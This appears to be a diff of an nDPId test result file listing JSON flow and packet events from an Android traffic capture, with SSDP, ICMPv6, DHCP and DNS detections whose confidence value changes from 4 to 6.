00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1582454825628,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454825628,"pkt":"AQBef\/\/62DBiVgAcCABFAACa4oMAAP8RXP2p\/uHY7\/\/\/+ux6B2wAhmGgTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"android.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825628,"flow_last_seen":1582454825628,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825628,"l3_proto":"ip4","src_ip":"169.254.225.216","dst_ip":"239.255.255.250","src_port":60538,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1582454825629,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1582454825629,"pkt":"AQBef\/\/6xiwDYGpkCABFAACaWhcAAAERrJjAqAIB7\/\/\/+sjTB2wAhk51TS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSE9TVDogMjM5LjI1NS4yNTUuMjUwOjE5MDANCk1BTjogInNzZHA6ZGlzY292ZXIiDQpNWDogMQ0KU1Q6IHVybjpkaWFsLW11bHRpc2NyZWVuLW9yZzpzZXJ2aWNlOmRpYWw6MQ0KDQoA"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"android.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454825629,"flow_last_seen":1582454825629,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454825629,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"239.255.255.250","src_port":51411,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1582454826369,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454826369,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABItCAAAEARQDTAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 01124{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"android.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1582454853081,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":552,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":552,"pkt_l4_len":518,"thread_ts_msec":1582454853081,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAAIaAQwAAEAR8XbAqAIBwKgC\/0RcRFwCBr34eyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiaG9zdF9pbnQiOiAzMzA0MDI2MjQwMTMxNjcxMTI3MTc3MTQ1ODMyOTcxNTM2ODg0ODIsICJkaXNwbGF5bmFtZSI6ICIiLCAibmFtZXNwYWNlcyI6IFsyNzUwMzcwNTYwLCA3ODUyNjYxNzcsIDE1MjYyNjMwNDUsIDEzMzg2NTkyMDEsIDE0ODE5MzM3LCA0ODEwNTkxNzYwLCA0NTE0NzI2NTgsIDczNjM0MTUyOCwgOTM4ODEzODQ5LCAxMjY3Njk1MTA5LCA1NDQwNDA3MDcyLCA1ODM0NDk5NiwgOTk2MzA2MjE1LCA1MzAzMzAxMjQ4LCAyODUyMTYwNywgNDA1NjQ2MjU5MiwgNzA1MzYyNzE4NCwgMTUyMjE3NzU4NywgMTQyMTExNDM5OSwgMTI1MjExNjQyOSwgOTk0Njk3NzMsIDcwNzk2MzY2ODgsIDE3Njk2NDMwNywgMTI1NTQwNTY2LCAxMDQ3NDI4MTg5LCA0NzE2MTkwMDQ4LCA1NDY3MTYzMDg4LCAxMTk1MDQ0MDcxLCA5Njg1MzIyNCwgMTc2MDk5NjMsIDY0NzgzMDM0NDAsIDUxMTcwNjY0MiwgNjI5Nzk1NTE4NCwgMTQxNTYyMDM1MF19"} 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1582454856384,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1582454856384,"pkt":"\/\/\/\/\/\/\/\/xiwDYGpkCABFAABIA+oAAEAR8GrAqAIBwKgC\/+EV4RUANNgcU3BvdFVkcDDcFXQoLlJiTAABAARIlcIDokHeIIm5eNggVkvVDJHA6KPmCng="} 00544{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1582454865794,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":78,"pkt_l4_len":24,"thread_ts_msec":1582454865794,"pkt":"MzP\/n\/YnTGr2n\/Ynht1gAAAAABg6\/wAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAH\/n\/YnhwBLLgAAAAD+gAAAAAAAAE5q9v\/+n\/Yn"} -00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00605{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":64,"source":"android.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865794,"flow_last_seen":1582454865794,"flow_idle_time":140000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1582454865794,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::1:ff9f:f627","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00535{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1582454865802,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454865802,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} -00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00596{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":65,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454865802,"flow_last_seen":1582454865802,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454865802,"l3_proto":"ip6","src_ip":"::","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"android.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1582454866026,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866026,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAQAAAAAAAAAAAAAAAAAAAAD\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAHjDAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1582454866407,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454866407,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXYAAP8RB83AqAIBwKgCEABDAEQBNN9OAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQECNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} +00695{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":68,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866407,"flow_last_seen":1582454866407,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":300,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454866407,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.16","src_port":67,"dst_port":68,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00537{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1582454866448,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":114,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":114,"pkt_l4_len":60,"thread_ts_msec":1582454866448,"pkt":"MzMAAQACTGr2n\/Ynht1gBNipADwRAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAQACAiICIwA8Uc8B2OT+AAEADgABAAEl5RSOTGr2n\/YnAAMADA4ACMoAAAAAAAAAAAAIAAIAAAAGAAQAFwAY"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":69,"source":"android.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866448,"flow_last_seen":1582454866448,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1582454866448,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::1:2","src_port":546,"dst_port":547,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCPV6","breed":"Acceptable","category":"Network"}} 00842{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"android.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1582454866538,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":1582454866538,"pkt":"TGr2n\/YnxiwDYGpkCABFAAFILXcAAP8RB8zAqAIBwKgCEABDAEQBNNxOAgEGAO9+0loAAAAAAAAAAMCoAhDAqAIBAAAAAExq9p\/2JwAAAAAAAAAAAABMdWNhcy1pTWFjLmxvY2FsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEFNgTAqAIBMwQAAU4gAQT\/\/\/8AAwTAqAIBBgTAqAIB\/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00558{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866803,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} -00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":73,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1582454866803,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1582454866803,"pkt":"MzMAAAACTGr2n\/Ynht1gAAAAABA6\/\/6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAChQAIygAAAAABAUxq9p\/2Jw=="} -00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00618{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":74,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454866803,"flow_last_seen":1582454866803,"flow_idle_time":140000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454866803,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00505{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1582454866894,"flow_idle_time":140000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":90,"pkt_l4_len":28,"thread_ts_msec":1582454866894,"pkt":"MzMAAAAWTGr2n\/Ynht1gAAAAACQAAf6AAAAAAAAATmr2\/\/6f9if\/AgAAAAAAAAAAAAAAAAAWOgAFAgAAAQCPAEAQAAAAAQQAAAD\/AgAAAAAAAAAAAAH\/n\/Yn"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1582454867034,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1582454867034,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA\/qSJAAEARDCrAqAIQwKgCAc7ZADUAKwPW+6YBAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tAAABAAE="} -00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":78,"source":"android.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867034,"flow_last_seen":1582454867034,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1582454867034,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":52953,"dst_port":53,"l4_proto":"udp","ndpi": 